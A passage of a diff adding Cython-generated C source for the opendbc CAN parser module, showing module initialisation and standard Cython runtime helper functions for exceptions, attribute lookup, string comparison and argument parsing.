---*/ + #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + if (__Pyx_patch_abc() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + + /* "opendbc/can/parser_pyx.pyx":14 + * from .common cimport SignalParseOptions, MessageParseOptions, dbc_lookup, SignalValue, DBC + * + * import numbers # <<<<<<<<<<<<<< + * from collections import defaultdict + * + */ + __pyx_t_2 = __Pyx_ImportDottedModule(__pyx_n_s_numbers, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_numbers, __pyx_t_2) < 0) __PYX_ERR(0, 14, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":15 + * + * import numbers + * from collections import defaultdict # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = PyList_New(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_INCREF(__pyx_n_s_defaultdict); + __Pyx_GIVEREF(__pyx_n_s_defaultdict); + PyList_SET_ITEM(__pyx_t_2, 0, __pyx_n_s_defaultdict); + __pyx_t_3 = __Pyx_Import(__pyx_n_s_collections, __pyx_t_2, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_defaultdict); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_defaultdict, __pyx_t_2) < 0) __PYX_ERR(0, 15, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "opendbc/can/parser_pyx.pyx":111 + * self.update_strings([]) + * + * def update_strings(self, strings, sendcan=False): # <<<<<<<<<<<<<< + * for v in self.vl_all.values(): + * for l in v.values(): # no-cython-lint + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_7opendbc_3can_10parser_pyx_9CANParser_3update_strings, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_CANParser_update_strings, NULL, __pyx_n_s_opendbc_can_parser_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__10)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_3, __pyx_tuple__11); + if (PyDict_SetItem((PyObject *)__pyx_ptype_7opendbc_3can_10parser_pyx_CANParser->tp_dict, __pyx_n_s_update_strings, __pyx_t_3) < 0) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_7opendbc_3can_10parser_pyx_CANParser); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_7opendbc_3can_10parser_pyx_9CANParser_5__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_CANParser___reduce_cython, NULL, __pyx_n_s_opendbc_can_parser_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__13)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_3) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_7opendbc_3can_10parser_pyx_9CANParser_7__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_CANParser___setstate_cython, NULL, __pyx_n_s_opendbc_can_parser_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__15)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_3) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_7opendbc_3can_10parser_pyx_9CANDefine_3__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_CANDefine___reduce_cython, NULL, __pyx_n_s_opendbc_can_parser_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__16)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_3) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_7opendbc_3can_10parser_pyx_9CANDefine_5__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_CANDefine___setstate_cython, NULL, __pyx_n_s_opendbc_can_parser_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__17)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_3) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "opendbc/can/parser_pyx.pyx":1 + * # distutils: language = c++ # <<<<<<<<<<<<<< + * # cython: c_string_encoding=ascii, language_level=3 + * + */ + __pyx_t_3 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_3) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /*--- Wrapped vars code ---*/ + + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + if (__pyx_m) { + if (__pyx_d && stringtab_initialized) { + __Pyx_AddTraceback("init opendbc.can.parser_pyx", __pyx_clineno, __pyx_lineno, __pyx_filename); + } + #if !CYTHON_USE_MODULE_STATE + Py_CLEAR(__pyx_m); + #else + Py_DECREF(__pyx_m); + if (pystate_addmodule_run) { + PyObject *tp, *value, *tb; + PyErr_Fetch(&tp, &value, &tb); + PyState_RemoveModule(&__pyx_moduledef); + PyErr_Restore(tp, value, tb); + } + #endif + } else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_ImportError, "init opendbc.can.parser_pyx"); + } + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + #if CYTHON_PEP489_MULTI_PHASE_INIT + return (__pyx_m != NULL) ? 0 : -1; + #elif PY_MAJOR_VERSION >= 3 + return __pyx_m; + #else + return; + #endif +} +/* #### Code section: cleanup_globals ### */ +/* #### Code section: cleanup_module ### */ +/* #### Code section: main_method ### */ +/* #### Code section: utility_code_pragmas ### */ +#ifdef _MSC_VER +#pragma warning( push ) +/* Warning 4127: conditional expression is constant + * Cython uses constant conditional expressions to allow in inline functions to be optimized at + * compile-time, so this warning is not useful + */ +#pragma warning( disable : 4127 ) +#endif + + + +/* #### Code section: utility_code_def ### */ + +/* --- Runtime support code --- */ +/* Refnanny */ +#if CYTHON_REFNANNY +static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { + PyObject *m = NULL, *p = NULL; + void *r = NULL; + m = PyImport_ImportModule(modname); + if (!m) goto end; + p = PyObject_GetAttrString(m, "RefNannyAPI"); + if (!p) goto end; + r = PyLong_AsVoidPtr(p); +end: + Py_XDECREF(p); + Py_XDECREF(m); + return (__Pyx_RefNannyAPIStruct *)r; +} +#endif + +/* PyErrExceptionMatches */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i= 0x030C00A6 + PyObject *current_exception = tstate->current_exception; + if (unlikely(!current_exception)) return 0; + exc_type = (PyObject*) Py_TYPE(current_exception); + if (exc_type == err) return 1; +#else + exc_type = tstate->curexc_type; + if (exc_type == err) return 1; + if (unlikely(!exc_type)) return 0; +#endif + #if CYTHON_AVOID_BORROWED_REFS + Py_INCREF(exc_type); + #endif + if (unlikely(PyTuple_Check(err))) { + result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); + } else { + result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); + } + #if CYTHON_AVOID_BORROWED_REFS + Py_DECREF(exc_type); + #endif + return result; +} +#endif + +/* PyErrFetchRestore */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject *tmp_value; + assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); + if (value) { + #if CYTHON_COMPILING_IN_CPYTHON + if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) + #endif + PyException_SetTraceback(value, tb); + } + tmp_value = tstate->current_exception; + tstate->current_exception = value; + Py_XDECREF(tmp_value); +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + tmp_type = tstate->curexc_type; + tmp_value = tstate->curexc_value; + tmp_tb = tstate->curexc_traceback; + tstate->curexc_type = type; + tstate->curexc_value = value; + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#endif +} +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject* exc_value; + exc_value = tstate->current_exception; + tstate->current_exception = 0; + *value = exc_value; + *type = NULL; + *tb = NULL; + if (exc_value) { + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + #if CYTHON_COMPILING_IN_CPYTHON + *tb = ((PyBaseExceptionObject*) exc_value)->traceback; + Py_XINCREF(*tb); + #else + *tb = PyException_GetTraceback(exc_value); + #endif + } +#else + *type = tstate->curexc_type; + *value = tstate->curexc_value; + *tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; +#endif +} +#endif + +/* PyObjectGetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro)) + return tp->tp_getattro(obj, attr_name); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_getattr)) + return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); +#endif + return PyObject_GetAttr(obj, attr_name); +} +#endif + +/* PyObjectGetAttrStrNoError */ +static void __Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + __Pyx_PyErr_Clear(); +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { + PyObject *result; +#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { + return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); + } +#endif + result = __Pyx_PyObject_GetAttrStr(obj, attr_name); + if (unlikely(!result)) { + __Pyx_PyObject_GetAttrStr_ClearAttributeError(); + } + return result; +} + +/* GetBuiltinName */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name) { + PyObject* result = __Pyx_PyObject_GetAttrStrNoError(__pyx_b, name); + if (unlikely(!result) && !PyErr_Occurred()) { + PyErr_Format(PyExc_NameError, +#if PY_MAJOR_VERSION >= 3 + "name '%U' is not defined", name); +#else + "name '%.200s' is not defined", PyString_AS_STRING(name)); +#endif + } + return result; +} + +/* TupleAndListFromArray */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { + PyObject *v; + Py_ssize_t i; + for (i = 0; i < length; i++) { + v = dest[i] = src[i]; + Py_INCREF(v); + } +} +static CYTHON_INLINE PyObject * +__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + Py_INCREF(__pyx_empty_tuple); + return __pyx_empty_tuple; + } + res = PyTuple_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); + return res; +} +static CYTHON_INLINE PyObject * +__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + return PyList_New(0); + } + res = PyList_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); + return res; +} +#endif + +/* BytesEquals */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else + if (s1 == s2) { + return (equals == Py_EQ); + } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { + const char *ps1, *ps2; + Py_ssize_t length = PyBytes_GET_SIZE(s1); + if (length != PyBytes_GET_SIZE(s2)) + return (equals == Py_NE); + ps1 = PyBytes_AS_STRING(s1); + ps2 = PyBytes_AS_STRING(s2); + if (ps1[0] != ps2[0]) { + return (equals == Py_NE); + } else if (length == 1) { + return (equals == Py_EQ); + } else { + int result; +#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) + Py_hash_t hash1, hash2; + hash1 = ((PyBytesObject*)s1)->ob_shash; + hash2 = ((PyBytesObject*)s2)->ob_shash; + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + return (equals == Py_NE); + } +#endif + result = memcmp(ps1, ps2, (size_t)length); + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { + return (equals == Py_NE); + } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { + return (equals == Py_NE); + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +#endif +} + +/* UnicodeEquals */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else +#if PY_MAJOR_VERSION < 3 + PyObject* owned_ref = NULL; +#endif + int s1_is_unicode, s2_is_unicode; + if (s1 == s2) { + goto return_eq; + } + s1_is_unicode = PyUnicode_CheckExact(s1); + s2_is_unicode = PyUnicode_CheckExact(s2); +#if PY_MAJOR_VERSION < 3 + if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { + owned_ref = PyUnicode_FromObject(s2); + if (unlikely(!owned_ref)) + return -1; + s2 = owned_ref; + s2_is_unicode = 1; + } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { + owned_ref = PyUnicode_FromObject(s1); + if (unlikely(!owned_ref)) + return -1; + s1 = owned_ref; + s1_is_unicode = 1; + } else if (((!s2_is_unicode) & (!s1_is_unicode))) { + return __Pyx_PyBytes_Equals(s1, s2, equals); + } +#endif + if (s1_is_unicode & s2_is_unicode) { + Py_ssize_t length; + int kind; + void *data1, *data2; + if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) + return -1; + length = __Pyx_PyUnicode_GET_LENGTH(s1); + if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { + goto return_ne; + } +#if CYTHON_USE_UNICODE_INTERNALS + { + Py_hash_t hash1, hash2; + #if CYTHON_PEP393_ENABLED + hash1 = ((PyASCIIObject*)s1)->hash; + hash2 = ((PyASCIIObject*)s2)->hash; + #else + hash1 = ((PyUnicodeObject*)s1)->hash; + hash2 = ((PyUnicodeObject*)s2)->hash; + #endif + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + goto return_ne; + } + } +#endif + kind = __Pyx_PyUnicode_KIND(s1); + if (kind != __Pyx_PyUnicode_KIND(s2)) { + goto return_ne; + } + data1 = __Pyx_PyUnicode_DATA(s1); + data2 = __Pyx_PyUnicode_DATA(s2); + if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { + goto return_ne; + } else if (length == 1) { + goto return_eq; + } else { + int result = memcmp(data1, data2, (size_t)(length * kind)); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & s2_is_unicode) { + goto return_ne; + } else if ((s2 == Py_None) & s1_is_unicode) { + goto return_ne; + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +return_eq: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ); +return_ne: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_NE); +#endif +} + +/* fastcall */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) +{ + Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); + for (i = 0; i < n; i++) + { + if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; + } + for (i = 0; i < n; i++) + { + int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); + if (unlikely(eq != 0)) { + if (unlikely(eq < 0)) return NULL; // error + return kwvalues[i]; + } + } + return NULL; // not found (no exception set) +} +#endif + +/* RaiseArgTupleInvalid */ +static void __Pyx_RaiseArgtupleInvalid( + const char* func_name, + int exact, + Py_ssize_t num_min, + Py_ssize_t num_max, + Py_ssize_t num_found) +{ + Py_ssize_t num_expected; + const char *more_or_less; + if (num_found < num_min) { + num_expected = num_min; + more_or_less = "at least"; + } else { + num_expected = num_max; + more_or_less = "at most"; + } + if (exact) { + more_or_less = "exactly"; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes %.8s %" CYTHON_FORMAT_SSIZE_T "d positional argument%.1s (%" CYTHON_FORMAT_SSIZE_T "d given)", + func_name, more_or_less, num_expected, + (num_expected == 1) ? "" : "s", num_found); +} + +/* RaiseDoubleKeywords */ +static void __Pyx_RaiseDoubleKeywordsError( + const char* func_name, + PyObject* kw_name) +{ + PyErr_Format(PyExc_TypeError, + #if PY_MAJOR_VERSION >= 3 + "%s() got multiple values for keyword argument '%U'", func_name, kw_name); + #else + "%s() got multiple values for keyword argument '%s'", func_name, + PyString_AsString(kw_name)); + #endif +} + +/* ParseKeywords */ +static int __Pyx_ParseOptionalKeywords( + PyObject *kwds, + PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, + PyObject *values[], + Py_ssize_t num_pos_args, + const char* function_name) +{ + PyObject *key = 0, *value = 0; + Py_ssize_t pos = 0; + PyObject*** name; + PyObject*** first_kw_arg = argnames + num_pos_args; + int kwds_is_tuple = CYTHON_METH_FASTCALL && likely(PyTuple_Check(kwds)); + while (1) { + if (kwds_is_tuple) { + if (pos >= PyTuple_GET_SIZE(kwds)) break; + key = PyTuple_GET_ITEM(kwds, pos); + value = kwvalues[pos]; + pos++; + } + else + { + if (!PyDict_Next(kwds, &pos, &key, &value)) break; + } + name = first_kw_arg; + while (*name && (**name != key)) name++; + if (*name) { + values[name-argnames] = value; + continue; + } + name = first_kw_arg; + #if PY_MAJOR_VERSION < 3 + if (likely(PyString_Check(key))) { + while (*name) { + if ((CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**name) == PyString_GET_SIZE(key)) + && _PyString_Eq(**name, key)) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + if ((**argname == key) || ( + (CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**argname) == PyString_GET_SIZE(key)) + && _PyString_Eq(**argname, key))) { + goto arg_passed_twice; + } + argname++; + } + } + } else + #endif + if (likely(PyUnicode_Check(key))) { + while (*name) { + int cmp = ( + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**name) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**name, key) + ); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + int cmp = (**argname == key) ? 0 : + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**argname) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**argname, key); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) goto arg_passed_twice; + argname++; + } + } + } else + goto invalid_keyword_type; + if (kwds2) { + if (unlikely(PyDict_SetItem(kwds2, key, value))) goto bad; + } else { + goto invalid_keyword; + } + } + return 0; +arg_passed_twice: + __Pyx_RaiseDoubleKeywordsError(function_name, key); + goto bad; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + goto bad; +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif +bad: + return -1; +} + +/* RaiseUnboundLocalError */ +static CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname) { + PyErr_Format(PyExc_UnboundLocalError, "local variable '%s' referenced before assignment", varname); +} + +/* decode_c_bytes */ +static CYTHON_INLINE PyObject* __Pyx_decode_c_bytes( + const char* cstring, Py_ssize_t length, Py_ssize_t start, Py_ssize_t stop, + const char* encoding, const char* errors, + PyObject* (*decode_func)(const char *s, Py_ssize_t size, const char *errors)) { + if (unlikely((start < 0) | (stop < 0))) { + if (start < 0) { + start += length; + if (start < 0) + start = 0; + } + if (stop < 0) + stop += length; + } + if (stop > length) + stop = length; + if (unlikely(stop <= start)) + return __Pyx_NewRef(__pyx_empty_unicode); + length = stop - start; + cstring += start; + if (decode_func) { + return decode_func(cstring, length, errors); + } else { + return PyUnicode_Decode(cstring, length, encoding, errors); + } +} + +/* RaiseClosureNameError */ +static CYTHON_INLINE void __Pyx_RaiseClosureNameError(const char *varname) { + PyErr_Format(PyExc_NameError, "free variable '%s' referenced before assignment in enclosing scope", varname); +} + +/* PyFunctionFastCall */ +#if CYTHON_FAST_PYCALL && !CYTHON_VECTORCALL +static PyObject* __Pyx_PyFunction_FastCallNoKw(PyCodeObject *co, PyObject **args, Py_ssize_t na, + PyObject *globals) { + PyFrameObject *f; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject **fastlocals; + Py_ssize_t i; + PyObject *result; + assert(globals != NULL); + /* XXX Perhaps we should create a specialized + PyFrame_New() that doesn't take locals, but does + take builtins without sanity checking them. + */ + assert(tstate != NULL); + f = PyFrame_New(tstate, co, globals, NULL); + if (f == NULL) { + return NULL; + } + fastlocals = __Pyx_PyFrame_GetLocalsplus(f); + for (i = 0; i < na; i++) { + Py_INCREF(*args); + fastlocals[i] = *args++; + } + result = PyEval_EvalFrameEx(f,0); + ++tstate->recursion_depth; + Py_DECREF(f); + --tstate->recursion_depth; + return result; +} +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs) { + PyCodeObject *co = (PyCodeObject *)PyFunction_GET_CODE(func); + PyObject *globals = PyFunction_GET_GLOBALS(func); + PyObject *argdefs = PyFunction_GET_DEFAULTS(func); + PyObject *closure; +#if PY_MAJOR_VERSION >= 3 + PyObject *kwdefs; +#endif + PyObject *kwtuple, **k; + PyObject **d; + Py_ssize_t nd; + Py_ssize_t nk; + PyObject *result; + assert(kwargs == NULL || PyDict_Check(kwargs)); + nk = kwargs ? PyDict_Size(kwargs) : 0; + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) { + return NULL; + } + if ( +#if PY_MAJOR_VERSION >= 3 + co->co_kwonlyargcount == 0 && +#endif + likely(kwargs == NULL || nk == 0) && + co->co_flags == (CO_OPTIMIZED | CO_NEWLOCALS | CO_NOFREE)) { + if (argdefs == NULL && co->co_argcount == nargs) { + result = __Pyx_PyFunction_FastCallNoKw(co, args, nargs, globals); + goto done; + } + else if (nargs == 0 && argdefs != NULL + && co->co_argcount == Py_SIZE(argdefs)) { + /* function called with no arguments, but all parameters have + a default value: use default values as arguments .*/ + args = &PyTuple_GET_ITEM(argdefs, 0); + result =__Pyx_PyFunction_FastCallNoKw(co, args, Py_SIZE(argdefs), globals); + goto done; + } + } + if (kwargs != NULL) { + Py_ssize_t pos, i; + kwtuple = PyTuple_New(2 * nk); + if (kwtuple == NULL) { + result = NULL; + goto done; + } + k = &PyTuple_GET_ITEM(kwtuple, 0); + pos = i = 0; + while (PyDict_Next(kwargs, &pos, &k[i], &k[i+1])) { + Py_INCREF(k[i]); + Py_INCREF(k[i+1]); + i += 2; + } + nk = i / 2; + } + else { + kwtuple = NULL; + k = NULL; + } + closure = PyFunction_GET_CLOSURE(func); +#if PY_MAJOR_VERSION >= 3 + kwdefs = PyFunction_GET_KW_DEFAULTS(func); +#endif + if (argdefs != NULL) { + d = &PyTuple_GET_ITEM(argdefs, 0); + nd = Py_SIZE(argdefs); + } + else { + d = NULL; + nd = 0; + } +#if PY_MAJOR_VERSION >= 3 + result = PyEval_EvalCodeEx((PyObject*)co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, kwdefs, closure); +#else + result = PyEval_EvalCodeEx(co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, closure); +#endif + Py_XDECREF(kwtuple); +done: + Py_LeaveRecursiveCall(); + return result; +} +#endif + +/* PyObjectCall */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw) { + PyObject *result; + ternaryfunc call = Py_TYPE(func)->tp_call; + if (unlikely(!call)) + return PyObject_Call(func, arg, kw); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = (*call)(func, arg, kw); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectCallMethO */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg) { + PyObject *self, *result; + PyCFunction cfunc; + cfunc = PyCFunction_GET_FUNCTION(func); + self = PyCFunction_GET_SELF(func); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = cfunc(self, 